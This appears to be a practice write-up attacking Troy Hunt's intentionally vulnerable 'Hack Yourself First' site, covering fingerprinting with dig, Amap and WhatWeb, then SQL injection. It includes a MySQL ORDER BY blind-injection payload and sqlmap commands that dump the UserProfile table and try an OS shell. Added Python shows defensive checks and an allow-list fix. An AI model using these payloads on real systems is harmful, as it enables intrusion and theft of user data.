This site has many OWASP Top 10 flaws built in, so we can practise on it to improve our skills.
1. First, try Amap. Amap is a scanning tool that can probe a web application's version.
https://tools.kali.org/information-gathering/amap
First, let's find the IP address of hackyourselffirst.troyhunt.com.
dig @8.8.8.8 hackyourselffirst.troyhunt.com A
; <<>> DiG 9.10.3-P4-Debian <<>> @8.8.8.8 hackyourselffirst.troyhunt.com A
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6927
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;hackyourselffirst.troyhunt.com. IN A
;; ANSWER SECTION:
hackyourselffirst.troyhunt.com. 286 IN CNAME hackyourselffirst.azurewebsites.net.
hackyourselffirst.azurewebsites.net. 3586 IN CNAME waws-prod-bay-003.vip.azurewebsites.windows.net.
waws-prod-bay-003.vip.azurewebsites.windows.net. 286 IN CNAME waws-prod-bay-003.cloudapp.net.
waws-prod-bay-003.cloudapp.net. 46 IN A 137.117.17.70
;; Query time: 52 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Mon Nov 20 14:59:53 CST 2017
;; MSG SIZE rcvd: 223
The IP address is 137.117.17.70, and we can also see that hackyourselffirst.troyhunt.com sits behind a chain of aliases (CNAME records).
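As an added example (my code, not part of the original post), here is a small Python parser for the dig answer section above. It follows the CNAME chain to the terminal A record and also reports a dangling alias (one that nothing in the answer resolves) or a CNAME loop. The sample text is a constructed copy of the answer section shown above. Defenders keep this kind of alias inventory to notice when an external CNAME stops pointing at a host they still control.

```python
"""Parse a dig answer section and follow the CNAME chain to the final A record.

Added example, not part of the original post. The sample below is a
constructed copy of the dig answer section shown above.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: the ANSWER SECTION of the dig query shown above.
SAMPLE_DIG_OUTPUT = """\
;; ANSWER SECTION:
hackyourselffirst.troyhunt.com. 286 IN CNAME hackyourselffirst.azurewebsites.net.
hackyourselffirst.azurewebsites.net. 3586 IN CNAME waws-prod-bay-003.vip.azurewebsites.windows.net.
waws-prod-bay-003.vip.azurewebsites.windows.net. 286 IN CNAME waws-prod-bay-003.cloudapp.net.
waws-prod-bay-003.cloudapp.net. 46 IN A 137.117.17.70

;; Query time: 52 msec
"""

# dig prints: owner  ttl  class  type  rdata, separated by whitespace
_RR = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(CNAME|A)\s+(\S+)\s*$")


def parse_answer_section(text: str) -> Dict[str, List[Tuple[str, int, str]]]:
    """Return {owner: [(type, ttl, rdata), ...]} for CNAME and A records in the ANSWER SECTION."""
    records: Dict[str, List[Tuple[str, int, str]]] = {}
    in_answer = False
    for line in text.splitlines():
        if line.startswith(";; ANSWER SECTION:"):
            in_answer = True
            continue
        if in_answer and (not line.strip() or line.startswith(";")):
            break  # a blank line or the next ';;' section ends the answer section
        if in_answer:
            m = _RR.match(line)
            if m:
                owner, ttl, rtype, rdata = m.groups()
                records.setdefault(owner.rstrip("."), []).append(
                    (rtype, int(ttl), rdata.rstrip(".")))
    return records


def resolve_chain(records, name: str, max_hops: int = 10):
    """Follow CNAMEs from `name`; return (alias_chain, ip_addresses).

    A dangling chain (an alias whose target has no records in the answer)
    comes back with an empty IP list and the chain ending at that alias.
    """
    chain = [name.rstrip(".")]
    seen = {chain[0]}
    for _ in range(max_hops):
        rrs = records.get(chain[-1], [])
        ips = [rdata for rtype, _, rdata in rrs if rtype == "A"]
        if ips:
            return chain, ips
        cnames = [rdata for rtype, _, rdata in rrs if rtype == "CNAME"]
        if not cnames:
            return chain, []  # dangling: nothing resolves the last alias
        if cnames[0] in seen:
            raise ValueError("CNAME loop detected at %s" % cnames[0])
        seen.add(cnames[0])
        chain.append(cnames[0])
    raise ValueError("CNAME chain longer than %d hops" % max_hops)


def chain_for(name: str, text: str = SAMPLE_DIG_OUTPUT):
    """Convenience wrapper: parse `text` and resolve `name` through it."""
    return resolve_chain(parse_answer_section(text), name)


if __name__ == "__main__":
    chain, ips = chain_for("hackyourselffirst.troyhunt.com")
    print(" -> ".join(chain))
    print("A:", ips)
```

The parser stops at the first blank line after the answer section, so the `;; Query time` trailer and the EDNS pseudo-section are ignored; feed it the full dig output and it still returns only the four records above.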
Next, use Amap to probe the back-end web application.
amap -bqv 137.117.17.70 80
Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
Using response file /etc/amap/appdefs.resp ... loaded 346 responses
Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers
amap v5.4 (www.thc.org/thc-amap) started at 2017-11-20 15:02:35 - APPLICATION MAPPING mode
Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 137.117.17.70:80/tcp matches http - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>Microsoft Azure Web App - Error 404</titl
Protocol on 137.117.17.70:80/tcp matches http-iis - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>Microsoft Azure Web App - Error 404</titl
Protocol on 137.117.17.70:80/tcp matches http-apache-2 - banner: HTTP/1.1 400 Bad Request\r\nContent-Type text/html; charset=us-ascii\r\nServer Microsoft-HTTPAPI/2.0\r\nDate Mon, 20 Nov 2017 070234 GMT\r\nConnection close\r\nContent-Length 326\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
The result is not conclusive: according to Amap the site could be running either IIS or Apache.
Since Amap's result is unsatisfying, let's try the WhatWeb scanner next.
2. WhatWeb's website: https://www.morningstarsecurity.com/research/whatweb
WhatWeb has far more command-line options.
Usage: whatweb [options] <URLs>
TARGET SELECTION:
<TARGETs> Enter URLs, hostnames, IP adddresses, or
nmap-format IP ranges.
--input-file=FILE, -i Read targets from a file.
AGGRESSION:
--aggression, -a=LEVEL Set the aggression level. Default: 1.
1. Stealthy Makes one HTTP request per target and also
follows redirects.
3. Aggressive If a level 1 plugin is matched, additional
requests will be made.
PLUGINS:
--list-plugins, -l List all plugins.
--info-plugins, -I=[SEARCH] List all plugins with detailed information.
Optionally search with a keyword.
--search-plugins=STRING Search plugins for a keyword.
--grep, -g=STRING Search for STRING in HTTP responses. Reports
with a plugin named Grep.
OUTPUT:
--verbose, -v Verbose output includes plugin descriptions.
Use twice for debugging.
--colour,--color=WHEN control whether colour is used. WHEN may be
`never', `always', or `auto'.
HELP & MISCELLANEOUS:
--short-help This short usage help.
--help, -h Complete usage help.
EXAMPLE USAGE:
* Scan example.com.
./whatweb example.com
* Scan reddit.com slashdot.org with verbose plugin descriptions.
./whatweb -v reddit.com slashdot.org
* An aggressive scan of wired.com detects the exact version of WordPress.
./whatweb -a 3 www.wired.com
* Scan the local network quickly and suppress errors.
whatweb --no-errors 192.168.0.0/24
* Scan the local network for HTTPS websites.
whatweb --no-errors --url-prefix https:// 192.168.0.0/24
* Scan for crossdomain policies in the Alexa Top 1000.
./whatweb -i plugin-development/alexa-top-100.txt \
--url-suffix /crossdomain.xml -p crossdomain_xml
Note: This is the short usage help.
For the complete usage help use -h or --help.
Probing with WhatWeb gives us a lot more information.
whatweb -v hackyourselffirst.troyhunt.com
WhatWeb report for http://hackyourselffirst.troyhunt.com
Status : 200 OK
Title : Supercar Showdown - Supercar Showdown
IP : 137.117.17.70
Country : UNITED STATES, US
Summary : JQuery, ASP_NET[4.0.30319][MVC5.1], HttpOnly[ARRAffinity,ASP.NET_SessionId], Cookies[ARRAffinity,ASP.NET_SessionId,VisitStart], UncommonHeaders[x-aspnetmvc-version], HTML5, X-Powered-By[ASP.NET], X-XSS-Protection[0], Microsoft-IIS[8.0], Script[text/javascript], HTTPServer[Microsoft-IIS/8.0], Google-Analytics[Universal][UA-43629727-1]
Detected Plugins:
[ ASP_NET ]
ASP.NET is a free web framework that enables great Web
applications. Used by millions of developers, it runs some
of the biggest sites in the world.
Version : 4.0.30319 (from X-AspNet-Version HTTP header)
String : MVC5.1
Google Dorks: (2)
Website : http://www.asp.net/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : ASP.NET_SessionId
String : VisitStart
String : ARRAffinity
[ Google-Analytics ]
This plugin identifies the Google Analytics account.
Version : Universal
Account : UA-43629727-1
Website : http://www.google.com/analytics/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Microsoft-IIS/8.0 (from server string)
[ HttpOnly ]
If the HttpOnly flag is included in the HTTP set-cookie
response header and the browser supports it then the cookie
cannot be accessed through client side script - More Info:
http://en.wikipedia.org/wiki/HTTP_cookie
String : ARRAffinity,ASP.NET_SessionId
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ Microsoft-IIS ]
Microsoft Internet Information Services (IIS) for Windows
Server is a flexible, secure and easy-to-manage Web server
for hosting anything on the Web. From media streaming to
web application hosting, IIS's scalable and open
architecture is ready to handle the most demanding tasks.
Version : 8.0
Website : http://www.iis.net/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/javascript
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : x-aspnetmvc-version (from headers)
[ X-Powered-By ]
X-Powered-By HTTP header
String : ASP.NET (from x-powered-by string)
[ X-XSS-Protection ]
This plugin retrieves the X-XSS-Protection value from the
HTTP header. - More Info:
http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
aspx
String : 0
HTTP Headers:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3276
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
Set-Cookie: ASP.NET_SessionId=1ifarra5yyutpekgrkxcmcab; path=/; HttpOnly
Set-Cookie: VisitStart=11/20/2017 7:53:15 AM; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: ARRAffinity=a58b2af319235c59b570f5ff28442356c3b989ad5027b21b3d5cc5b39074afda;Path=/;HttpOnly;Domain=hackyourselffirst.troyhunt.com
Date: Mon, 20 Nov 2017 07:53:11 GMT
Connection: close
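The header block above is the raw material WhatWeb summarised. As an added example (my code, not WhatWeb's and not the site's), the Python below parses that block (copied here as a constructed sample) and reports what a defender would want fixed on the server: the four headers that disclose the exact IIS and ASP.NET versions, the cookies set without HttpOnly or Secure, and the X-XSS-Protection: 0 header that switches off the browser's filter. The `https_site` flag is an assumption on my part; the scan above was over plain HTTP, and the Secure attribute only matters once the site is served over HTTPS.

```python
"""Audit a raw HTTP response header block for the findings WhatWeb surfaced.

Added example, not part of the original post or of WhatWeb. The sample
response is a constructed copy of the header block shown above.
"""
from typing import Dict, List, Tuple

SAMPLE_RESPONSE = """\
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3276
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
Set-Cookie: ASP.NET_SessionId=1ifarra5yyutpekgrkxcmcab; path=/; HttpOnly
Set-Cookie: VisitStart=11/20/2017 7:53:15 AM; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: ARRAffinity=a58b2af319235c59b570f5ff28442356c3b989ad5027b21b3d5cc5b39074afda;Path=/;HttpOnly;Domain=hackyourselffirst.troyhunt.com
Date: Mon, 20 Nov 2017 07:53:11 GMT
Connection: close
"""

# Headers that tell a scanner exactly which stack and version is running.
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Return [(name_lower, value), ...], keeping repeated headers such as Set-Cookie."""
    lines = raw.splitlines()
    if lines and lines[0].startswith("HTTP/"):
        lines = lines[1:]  # drop the status line
    headers = []
    for line in lines:
        if not line.strip():
            break  # a blank line ends the header block
        name, _, value = line.partition(":")  # split on the first colon only
        headers.append((name.strip().lower(), value.strip()))
    return headers


def audit_cookies(headers, https_site: bool = True) -> Dict[str, List[str]]:
    """Map each cookie name to the flags it is missing (HttpOnly, Secure)."""
    findings = {}
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        # attribute names are case-insensitive; the ARRAffinity cookie uses "Path"/"HttpOnly"
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if https_site and "secure" not in attrs:
            missing.append("Secure")
        findings[cookie_name] = missing
    return findings


def audit_response(raw: str, https_site: bool = True) -> Dict[str, object]:
    """Collect version disclosure, weak cookie flags and a disabled XSS filter."""
    headers = parse_headers(raw)
    disclosed = {n: v for n, v in headers if n in FINGERPRINT_HEADERS}
    xss = dict(headers).get("x-xss-protection")
    return {
        "version_disclosure": disclosed,
        "cookies_missing_flags": audit_cookies(headers, https_site),
        "xss_filter_disabled": xss is not None and xss.strip().startswith("0"),
    }


if __name__ == "__main__":
    for key, value in audit_response(SAMPLE_RESPONSE).items():
        print(key, "=", value)
```

On IIS/ASP.NET the Server, X-Powered-By, X-AspNet-Version and X-AspNetMvc-Version headers can all be suppressed in configuration, and the session cookie should carry both HttpOnly and Secure; this audit is the check to run after making those changes.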
3. Use sqlmap for SQL injection.
URL:
Because the injection point here is an ORDER BY parameter, the payload has to be an ORDER BY clause; unfortunately I don't know how to exploit ORDER BY on SQL Server, so I can only rely on sqlmap. If it were MySQL, a SQL statement like the following could be used.
select id from news where id=1 order by 1,(select case when(1=2) then 1 else 1* (select table_name from information_schema.tables)end)=1;
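To show why an ORDER BY parameter is injectable at all, and what the application side should do about it, here is an added Python example (my code, not from the original post or from the Hack Yourself First site). It uses an in-memory SQLite database with a constructed Supercar table; only the key name supercarid is taken from the orderby parameter above. The unsafe function splices the parameter into the SQL text, so any expression the database accepts is evaluated (the subquery used is the SQLite counterpart of the MySQL payload above). The safe function maps the key through an allow-list and emits only a fixed column identifier, raising on anything else.

```python
"""ORDER BY built by string concatenation versus an allow-listed sort key.

Added example, not part of the original post. Schema and rows are
constructed; the sort key "supercarid" mirrors the orderby parameter above.
"""
import sqlite3

# User-facing sort keys mapped to the only column identifiers we will ever emit.
ALLOWED_SORT_KEYS = {
    "supercarid": "SupercarId",
    "name": "Name",
    "price": "Price",
}


def make_db() -> sqlite3.Connection:
    """Constructed sample data: four cars across two makes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Supercar (SupercarId INTEGER, MakeId INTEGER, Name TEXT, Price INTEGER)")
    conn.executemany(
        "INSERT INTO Supercar VALUES (?, ?, ?, ?)",
        [(3, 1, "Car C", 300000), (1, 1, "Car A", 100000),
         (2, 1, "Car B", 200000), (4, 2, "Car D", 50000)],
    )
    return conn


def list_cars_unsafe(conn, make_id: int, orderby: str):
    """Vulnerable: the orderby string becomes part of the SQL text.

    MakeId is bound as a parameter, which is correct, but ORDER BY takes an
    identifier or expression, and this code lets the caller supply either.
    """
    sql = "SELECT SupercarId, Name FROM Supercar WHERE MakeId = ? ORDER BY " + orderby
    return conn.execute(sql, (make_id,)).fetchall()


def list_cars_safe(conn, make_id: int, orderby: str, descending: bool = False):
    """Hardened: only an allow-listed key reaches the query, as a fixed identifier."""
    column = ALLOWED_SORT_KEYS.get(orderby.lower())
    if column is None:
        raise ValueError("unsupported sort key: %r" % orderby)
    direction = "DESC" if descending else "ASC"
    sql = ("SELECT SupercarId, Name FROM Supercar WHERE MakeId = ? "
           "ORDER BY %s %s" % (column, direction))
    return conn.execute(sql, (make_id,)).fetchall()


def demo():
    """Run both variants with a legitimate key and with an expression in its place."""
    conn = make_db()
    normal = list_cars_safe(conn, 1, "supercarid")
    # An expression where a column name is expected. The unsafe query still
    # executes, which proves the database evaluated caller-supplied SQL; the
    # safe version rejects it before any SQL text is built.
    injected = "(SELECT count(*) FROM sqlite_master)"
    unsafe_ran = list_cars_unsafe(conn, 1, injected) is not None
    try:
        list_cars_safe(conn, 1, injected)
        safe_rejected = False
    except ValueError:
        safe_rejected = True
    return normal, unsafe_ran, safe_rejected


if __name__ == "__main__":
    print(demo())
```

A prepared-statement placeholder cannot stand in for an identifier in ORDER BY, which is why the fix here is an allow-list rather than parameter binding; the same pattern applies to table names, column lists and sort direction.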
sqlmap is a very powerful weapon; in my testing, all of the following commands work. The last one, which dumps the data, takes around 4 to 5 minutes.
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dbs
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-user
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-db
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --tables -D 'hackyourselffirst_db'
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --column -T UserProfile -D 'hackyourselffirst_db'
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dump -T UserProfile -D 'hackyourselffirst_db'
Only the --os-shell command did not succeed.
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --os-shell
But I'm already quite satisfied: sqlmap is a very powerful automated SQL injection tool. One person can't be expected to master every exploitable SQL clause, and that is where sqlmap plays a key role.